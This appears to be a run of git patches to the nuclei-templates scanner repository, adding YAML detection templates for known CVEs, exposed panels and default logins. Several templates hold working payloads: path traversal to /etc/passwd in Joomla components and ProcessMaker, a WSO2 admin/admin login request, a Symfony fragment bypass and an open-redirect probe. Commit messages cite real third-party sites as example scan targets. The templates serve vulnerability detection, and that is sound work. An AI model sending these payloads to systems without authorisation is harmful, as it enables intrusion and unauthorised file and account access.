"{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 4c5d8240addf71862d7543b6d001c52c8e324cfe Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 30 Aug 2021 02:47:26 -0400 Subject: [PATCH 1924/4083] Update grails-database-admin-console.yaml Solves the case where the response is "Sorry, remote connections ('webAllowOthers') are disabled on this server" Example: nuclei -t nuclei-templates/exposed-panels/grails-database-admin-console.yaml -u https://uptime-service.ford.com --- exposed-panels/grails-database-admin-console.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/exposed-panels/grails-database-admin-console.yaml b/exposed-panels/grails-database-admin-console.yaml index f2ed34b32f..df1f9657da 100644 --- a/exposed-panels/grails-database-admin-console.yaml +++ b/exposed-panels/grails-database-admin-console.yaml @@ -13,7 +13,12 @@ requests: - '{{BaseURL}}/dbconsole/' - '{{BaseURL}}/h2-console/' + matchers-condition: and matchers: - type: word words: - "H2 Console" + - type: word + words: + - "Sorry, remote connections ('webAllowOthers') are disabled on this server" + negative: true From 7a9093c8a7922de5258cde51f85baea70a340130 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 30 Aug 2021 02:55:35 -0400 Subject: [PATCH 1925/4083] Update dbeaver-credentials.yaml Change solve the false positives due to {} (empty response) Example nuclei -t nuclei-templates/exposures/configs/dbeaver-credentials.yaml -u https://lbs.map.qq.com --- exposures/configs/dbeaver-credentials.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/exposures/configs/dbeaver-credentials.yaml b/exposures/configs/dbeaver-credentials.yaml index c25710bdcf..30e1e2e38f 100644 --- a/exposures/configs/dbeaver-credentials.yaml +++ b/exposures/configs/dbeaver-credentials.yaml @@ -24,3 +24,7 @@ requests: words: - "application/octet-stream" part: header + - type: dsl + dsl: + - 'len(body) > 2' + From e1bdef24c0ef8ffda017b1a9b37ffbc1c7313ad7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?B=C3=B9i=20=C4=90=E1=BA=A1i=20Gia?= Date: Mon, 30 Aug 2021 16:37:57 +0700 Subject: [PATCH 1926/4083] Create wso2-default-password.yaml --- .../wso2/wso2-default-password.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 default-logins/wso2/wso2-default-password.yaml diff --git a/default-logins/wso2/wso2-default-password.yaml b/default-logins/wso2/wso2-default-password.yaml new file mode 100644 index 0000000000..755be6bc3d --- /dev/null +++ b/default-logins/wso2/wso2-default-password.yaml @@ -0,0 +1,25 @@ +id: wso2-management-console-default-password + +info: + name: WSO2 Management Console Default Password + author: cocxanh + severity: high + tags: default-login,wso2 + +requests: + - raw: + - | + POST /carbon/admin/login_action.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Accept-Language: en-US,en;q=0.9 + Connection: close + Content-Length: 29 + + username=admin&password=admin + redirects: false + matchers: + - type: word + words: + - "index.jsp?loginStatus=true" + part: header From 65497ce696d5d67c13bb6d79ad21bf35417a758c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 30 Aug 2021 12:47:31 +0300 Subject: [PATCH 1927/4083] Description and reference --- cves/2019/CVE-2019-15889.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-15889.yaml b/cves/2019/CVE-2019-15889.yaml index 0f46219cb3..c3835a62a8 100644 --- a/cves/2019/CVE-2019-15889.yaml +++ b/cves/2019/CVE-2019-15889.yaml @@ -4,7 +4,10 @@ info: name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 + description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 + - https://www.cybersecurity-help.cz/vdb/SB2019041819 tags: cve,cve2019,wordpress,xss,wp-plugin requests: From 51eb639de828ff4cc04725498db5ddc038b135c5 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 30 Aug 2021 12:49:23 +0300 Subject: [PATCH 1928/4083] Updated --- cves/2020/CVE-2020-29395.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml index 9b1e964acb..1072df2e03 100644 --- a/cves/2020/CVE-2020-29395.yaml +++ b/cves/2020/CVE-2020-29395.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field. reference: - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 From 5b344c944c8f4b52014848b3a11369a60288cf7d Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 30 Aug 2021 12:50:56 +0300 Subject: [PATCH 1929/4083] Updated --- cves/2018/CVE-2018-16299.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml index f14b9a2c99..fc05d97e9b 100644 --- a/cves/2018/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin Localize My Post 1.0 - LFI author: 0x_Akoko,0x240x23elu severity: high + description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter. reference: https://www.exploit-db.com/exploits/45439 tags: wordpress,cve2018,cve,lfi From 96cdcb8a2b52d894f74d1d51decff7bca062760c Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 30 Aug 2021 15:21:21 +0530 Subject: [PATCH 1930/4083] Update grails-database-admin-console.yaml --- exposed-panels/grails-database-admin-console.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/grails-database-admin-console.yaml b/exposed-panels/grails-database-admin-console.yaml index df1f9657da..d2aaaaddb9 100644 --- a/exposed-panels/grails-database-admin-console.yaml +++ b/exposed-panels/grails-database-admin-console.yaml @@ -18,6 +18,7 @@ requests: - type: word words: - "H2 Console" + - type: word words: - "Sorry, remote connections ('webAllowOthers') are disabled on this server" From 0e9ce643dbbcd43e459abaff2559775d5cc30464 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 30 Aug 2021 12:51:47 +0300 Subject: [PATCH 1931/4083] Updated --- cves/2021/CVE-2021-24495.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml index 1c13d872ec..4a5b9a1610 100644 --- a/cves/2021/CVE-2021-24495.yaml +++ b/cves/2021/CVE-2021-24495.yaml @@ -5,6 +5,7 @@ info: author: johnjhacking severity: medium tags: cve,cve2021,wp-plugin,wordpress,xss + description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue. reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers From f3348fa612655903df468d584ba315f45bbd3910 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 30 Aug 2021 12:53:22 +0300 Subject: [PATCH 1932/4083] Updated --- cves/2019/CVE-2019-14470.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 05400bc1a4..82704b61f3 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter. reference: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 From 7608386bb314ca42acad7f3a6bf56651458a075f Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 30 Aug 2021 15:24:34 +0530 Subject: [PATCH 1933/4083] Update dbeaver-credentials.yaml --- exposures/configs/dbeaver-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/dbeaver-credentials.yaml b/exposures/configs/dbeaver-credentials.yaml index 30e1e2e38f..982e0756de 100644 --- a/exposures/configs/dbeaver-credentials.yaml +++ b/exposures/configs/dbeaver-credentials.yaml @@ -24,7 +24,7 @@ requests: words: - "application/octet-stream" part: header + - type: dsl dsl: - 'len(body) > 2' - From 0975ac3f9afeb4e789317335c7e2a3a97cf89fa0 Mon Sep 17 00:00:00 2001 From: meme-lord <17912559+meme-lord@users.noreply.github.com> Date: Mon, 30 Aug 2021 14:49:02 +0100 Subject: [PATCH 1934/4083] Added CVE-2015-4050 --- cves/2015/CVE-2015-4050.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2015/CVE-2015-4050.yaml diff --git a/cves/2015/CVE-2015-4050.yaml b/cves/2015/CVE-2015-4050.yaml new file mode 100644 index 0000000000..659b133457 --- /dev/null +++ b/cves/2015/CVE-2015-4050.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-4050 + +info: + name: CVE-2015-4050 + author: ELSFA7110 + severity: high + reference: | + - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access + tags: cve,cve2015,symfony,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1" + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Credits" + part: body + + - type: status + status: + - 200 From be7aca060cf0ddfd30a5db9c2c606b149f658204 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 30 Aug 2021 23:52:12 +0530 Subject: [PATCH 1935/4083] Update CVE-2019-15889.yaml --- cves/2019/CVE-2019-15889.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-15889.yaml b/cves/2019/CVE-2019-15889.yaml index c3835a62a8..6ccc20b699 100644 --- a/cves/2019/CVE-2019-15889.yaml +++ b/cves/2019/CVE-2019-15889.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter. - reference: + reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 - https://www.cybersecurity-help.cz/vdb/SB2019041819 tags: cve,cve2019,wordpress,xss,wp-plugin From aeac5bbec3d32310c52944d13794763aaa698c6f Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 31 Aug 2021 01:03:44 +0530 Subject: [PATCH 1936/4083] misc update --- exposures/files/webpack-sourcemap-disclosure.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/exposures/files/webpack-sourcemap-disclosure.yaml b/exposures/files/webpack-sourcemap-disclosure.yaml index 497b3bbd21..4cca2ba348 100644 --- a/exposures/files/webpack-sourcemap-disclosure.yaml +++ b/exposures/files/webpack-sourcemap-disclosure.yaml @@ -3,7 +3,7 @@ id: webpack-sourcemap-disclosure info: name: Webpack Sourcemap Disclosure author: dhiyaneshDk - severity: medium + severity: info tags: exposure,files requests: @@ -16,8 +16,10 @@ requests: matchers: - type: word words: - - "application/octet-stream" - part: header + - '"version":' + - '"file":' + - '"sources":' + condition: and - type: status status: From 91d058737521a5787eb51501de4b8c4ce589d194 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 31 Aug 2021 08:26:22 +0700 Subject: [PATCH 1937/4083] Create CVE-2010-1980.yaml --- cves/2010/CVE-2010-1980.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1980.yaml diff --git a/cves/2010/CVE-2010-1980.yaml b/cves/2010/CVE-2010-1980.yaml new file mode 100644 index 0000000000..37219a9e71 --- /dev/null +++ b/cves/2010/CVE-2010-1980.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1980 + +info: + name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12085 + - https://www.cvedetails.com/cve/CVE-2010-1980 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From bdf447dd2d28355cc1aec79a788d97f35b97d692 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 31 Aug 2021 12:35:08 +0900 Subject: [PATCH 1938/4083] Create CVE-2021-24288.yaml --- CVE-2021-24288.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 CVE-2021-24288.yaml diff --git a/CVE-2021-24288.yaml b/CVE-2021-24288.yaml new file mode 100644 index 0000000000..7416ac7600 --- /dev/null +++ b/CVE-2021-24288.yaml @@ -0,0 +1,21 @@ +id: CVE-2021-24288 + +info: + name: AcyMailing < 7.5.0 - Open Redirect + author: 0x_Akoko + description: | + When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription. + reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 + severity: medium + tags: wordpress,cve,cve2021,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 886c06b53eb9c63a99139ee11e73591f7ce0821b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 10:57:44 +0530 Subject: [PATCH 1939/4083] Rename CVE-2021-24288.yaml to cves/2021/CVE-2021-24288.yaml --- CVE-2021-24288.yaml => cves/2021/CVE-2021-24288.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename CVE-2021-24288.yaml => cves/2021/CVE-2021-24288.yaml (100%) diff --git a/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml similarity index 100% rename from CVE-2021-24288.yaml rename to cves/2021/CVE-2021-24288.yaml From eb820fe1f22a93de148a99838029b105ba56ee4c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 11:07:38 +0530 Subject: [PATCH 1940/4083] Update CVE-2021-24288.yaml --- cves/2021/CVE-2021-24288.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml index 7416ac7600..d5b21f2ecd 100644 --- a/cves/2021/CVE-2021-24288.yaml +++ b/cves/2021/CVE-2021-24288.yaml @@ -3,11 +3,10 @@ id: CVE-2021-24288 info: name: AcyMailing < 7.5.0 - Open Redirect author: 0x_Akoko - description: | - When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription. - reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 severity: medium - tags: wordpress,cve,cve2021,redirect + description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription. + reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 + tags: wordpress,cve,cve2021,redirect,wp-plugin requests: - method: GET From 0367971163a77adae9f380596cb53a836d73ca2e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 11:10:15 +0530 Subject: [PATCH 1941/4083] Update CVE-2010-1219.yaml --- cves/2010/CVE-2010-1219.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2010/CVE-2010-1219.yaml b/cves/2010/CVE-2010-1219.yaml index d43fb80967..904655afb1 100644 --- a/cves/2010/CVE-2010-1219.yaml +++ b/cves/2010/CVE-2010-1219.yaml @@ -1,5 +1,4 @@ id: CVE-2010-1219 - info: name: Joomla! Component com_janews - Local File Inclusion author: daffainfo From a125e800098319e8e9d8318583d0215298d26c31 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 11:32:07 +0530 Subject: [PATCH 1942/4083] Update wso2-default-password.yaml --- default-logins/wso2/wso2-default-password.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/default-logins/wso2/wso2-default-password.yaml b/default-logins/wso2/wso2-default-password.yaml index 755be6bc3d..4e89966a66 100644 --- a/default-logins/wso2/wso2-default-password.yaml +++ b/default-logins/wso2/wso2-default-password.yaml @@ -4,6 +4,7 @@ info: name: WSO2 Management Console Default Password author: cocxanh severity: high + reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console tags: default-login,wso2 requests: @@ -21,5 +22,7 @@ requests: matchers: - type: word words: - - "index.jsp?loginStatus=true" + - "/carbon/admin/index.jsp?loginStatus=true" + - "JSESSIONID" part: header + condition: and From c3bffc33cef826cfcd0b6f66c58fbb0bda42bd0c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 11:37:54 +0530 Subject: [PATCH 1943/4083] Update CVE-2015-4050.yaml --- cves/2015/CVE-2015-4050.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2015/CVE-2015-4050.yaml b/cves/2015/CVE-2015-4050.yaml index 659b133457..01a2b0d9ef 100644 --- a/cves/2015/CVE-2015-4050.yaml +++ b/cves/2015/CVE-2015-4050.yaml @@ -1,11 +1,10 @@ id: CVE-2015-4050 info: - name: CVE-2015-4050 + name: ESI unauthorized access author: ELSFA7110 severity: high - reference: | - - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access + reference: https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access tags: cve,cve2015,symfony,rce requests: From b27bdcab41eadd2dd2a1bdd7bb37529eb5c4f805 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 12:00:11 +0530 Subject: [PATCH 1944/4083] Update CVE-2019-17503.yaml --- cves/2019/CVE-2019-17503.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-17503.yaml b/cves/2019/CVE-2019-17503.yaml index 836d2793d8..beca789136 100644 --- a/cves/2019/CVE-2019-17503.yaml +++ b/cves/2019/CVE-2019-17503.yaml @@ -21,9 +21,10 @@ requests: - type: status status: - 200 + - type: word part: body words: - "DEBUGMAPSCRIPT=TRUE" - - "sql" - condition: or + - "@echo off" + condition: and From 64b25c359b35c077e0bf57c6fe71f155dda3c0ff Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 12:07:28 +0530 Subject: [PATCH 1945/4083] Update CVE-2018-8719.yaml --- cves/2018/CVE-2018-8719.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/cves/2018/CVE-2018-8719.yaml b/cves/2018/CVE-2018-8719.yaml index 538ffeeb26..ccef2695c1 100644 --- a/cves/2018/CVE-2018-8719.yaml +++ b/cves/2018/CVE-2018-8719.yaml @@ -21,11 +21,10 @@ requests: - type: status status: - 200 + - type: word words: - - "TXT" + - "[TXT]" - ".log" - condition: or - - type: word - words: - - 'Index of' + - "Index of" + condition: and From 212072fad214c0f259424de93260b3caadf329f9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 13:31:48 +0530 Subject: [PATCH 1946/4083] Update unauthenticated-mongo-express.yaml --- misconfiguration/unauthenticated-mongo-express.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/misconfiguration/unauthenticated-mongo-express.yaml b/misconfiguration/unauthenticated-mongo-express.yaml index 75cdbc0890..85c6224918 100644 --- a/misconfiguration/unauthenticated-mongo-express.yaml +++ b/misconfiguration/unauthenticated-mongo-express.yaml @@ -1,4 +1,4 @@ -id: unauthenticated-mongo-express.yaml +id: unauthenticated-mongo-express info: name: Mongo Express Unauthenticated @@ -12,12 +12,15 @@ requests: path: - '{{BaseURL}}' - '{{BaseURL}}/mongo-express/' + - '{{BaseURL}}/db/admin/system.users' matchers-condition: and matchers: - type: word words: - 'Home - Mongo Express' + - 'system.users - Mongo Express' + condition: or - type: status status: - 200 From bec1c542cd88e29bba219d8466eb84610ffc74c8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 13:32:56 +0530 Subject: [PATCH 1947/4083] Update unauthenticated-mongo-express.yaml --- misconfiguration/unauthenticated-mongo-express.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauthenticated-mongo-express.yaml b/misconfiguration/unauthenticated-mongo-express.yaml index 85c6224918..da55b10013 100644 --- a/misconfiguration/unauthenticated-mongo-express.yaml +++ b/misconfiguration/unauthenticated-mongo-express.yaml @@ -2,7 +2,7 @@ id: unauthenticated-mongo-express info: name: Mongo Express Unauthenticated - author: dhiyaneshDK + author: dhiyaneshDK,b0rn2r00t severity: high reference: https://www.exploit-db.com/ghdb/5684 tags: mongo,unauth From 0b69ea80b2b2e1cc2cc4f307e1021bc7bbfa69e9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 14:03:47 +0530 Subject: [PATCH 1948/4083] Create processmaker-lfi.yaml --- vulnerabilities/other/processmaker-lfi.yaml | 27 +++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/other/processmaker-lfi.yaml diff --git a/vulnerabilities/other/processmaker-lfi.yaml b/vulnerabilities/other/processmaker-lfi.yaml new file mode 100644 index 0000000000..0e01d0a767 --- /dev/null +++ b/vulnerabilities/other/processmaker-lfi.yaml @@ -0,0 +1,27 @@ +id: processmaker-lfi + +info: + name: ProcessMaker <= 3.5.4 Directory Traversal + author: KrE80r + severity: high + reference: + - https://www.exploit-db.com/exploits/50229 + - https://www.processmaker.com + tags: processmaker,lfi + +requests: + - raw: + - | + GET /../../../..//etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 5c5c6c39746fe826fb77b159403e5168c45d2fe8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 31 Aug 2021 14:08:11 +0530 Subject: [PATCH 1949/4083] Update processmaker-lfi.yaml --- vulnerabilities/other/processmaker-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/processmaker-lfi.yaml b/vulnerabilities/other/processmaker-lfi.yaml index 0e01d0a767..824c545e2f 100644 --- a/vulnerabilities/other/processmaker-lfi.yaml +++ b/vulnerabilities/other/processmaker-lfi.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://www.exploit-db.com/exploits/50229 - - https://www.processmaker.com + - https://www.processmaker.com tags: processmaker,lfi requests: From c74ccb5292c213c10be373a0784a7bb06713b3af Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 31 Aug 2021 15:44:09 +0700 Subject: [PATCH 1950/4083] Create CVE-2010-1717.yaml --- cves/2010/CVE-2010-1717.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1717.yaml diff --git a/cves/2010/CVE-2010-1717.yaml b/cves/2010/CVE-2010-1717.yaml new file mode 100644 index 0000000000..cb08bb4b40 --- /dev/null +++ b/cves/2010/CVE-2010-1717.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1717 + +info: + name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12291 + - https://www.cvedetails.com/cve/CVE-2010-1717 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 7a986d0d0916e9a6bab220dd263f33833bd0bf60 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 31 Aug 2021 20:48:40 +0530 Subject: [PATCH 1951/4083] misc update --- cves/2015/CVE-2015-4050.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2015/CVE-2015-4050.yaml b/cves/2015/CVE-2015-4050.yaml index 01a2b0d9ef..a56e9847ee 100644 --- a/cves/2015/CVE-2015-4050.yaml +++ b/cves/2015/CVE-2015-4050.yaml @@ -2,10 +2,13 @@ id: CVE-2015-4050 info: name: ESI unauthorized access - author: ELSFA7110 + author: ELSFA7110,meme-lord severity: high - reference: https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access + description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment. tags: cve,cve2015,symfony,rce + reference: + - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access + - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 requests: - method: GET From 32e7a66a233a49607456430de93d6cb2d8f32119 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 31 Aug 2021 16:29:47 +0000 Subject: [PATCH 1952/4083] Auto Generated Templates Stats [Tue Aug 31 16:29:47 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1437 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 732 insertions(+), 727 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 2770ad553e..1aab383f1d 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":632},{"name":"panel","count":232},{"name":"xss","count":224},{"name":"exposure","count":214},{"name":"lfi","count":207},{"name":"wordpress","count":203},{"name":"rce","count":189},{"name":"cve2020","count":157},{"name":"wp-plugin","count":136},{"name":"tech","count":105},{"name":"cve2021","count":104},{"name":"config","count":93},{"name":"cve2019","count":90},{"name":"cve2018","count":79},{"name":"takeover","count":74},{"name":"","count":66},{"name":"apache","count":64},{"name":"token","count":64},{"name":"default-login","count":57},{"name":"iot","count":56},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"oob","count":45},{"name":"joomla","count":40},{"name":"network","count":38},{"name":"sqli","count":37},{"name":"cve2010","count":32},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"oracle","count":30},{"name":"workflow","count":30},{"name":"logs","count":30},{"name":"jira","count":27},{"name":"atlassian","count":27},{"name":"misc","count":27},{"name":"redirect","count":25},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"disclosure","count":18},{"name":"cve2015","count":18},{"name":"sap","count":18},{"name":"auth-bypass","count":17},{"name":"router","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":14},{"name":"cve2012","count":14},{"name":"misconfig","count":13},{"name":"cve2011","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"android","count":13},{"name":"dlink","count":12},{"name":"weblogic","count":12},{"name":"php","count":12},{"name":"dns","count":12},{"name":"jenkins","count":12},{"name":"adobe","count":12},{"name":"devops","count":11},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"xxe","count":9},{"name":"ruijie","count":8},{"name":"login","count":8},{"name":"scada","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"nginx","count":7},{"name":"backup","count":7},{"name":"vmware","count":7},{"name":"cms","count":7},{"name":"cve2009","count":7},{"name":"google","count":6},{"name":"laravel","count":6},{"name":"api","count":6},{"name":"files","count":6},{"name":"dell","count":6},{"name":"netgear","count":6},{"name":"rconfig","count":6},{"name":"solr","count":6},{"na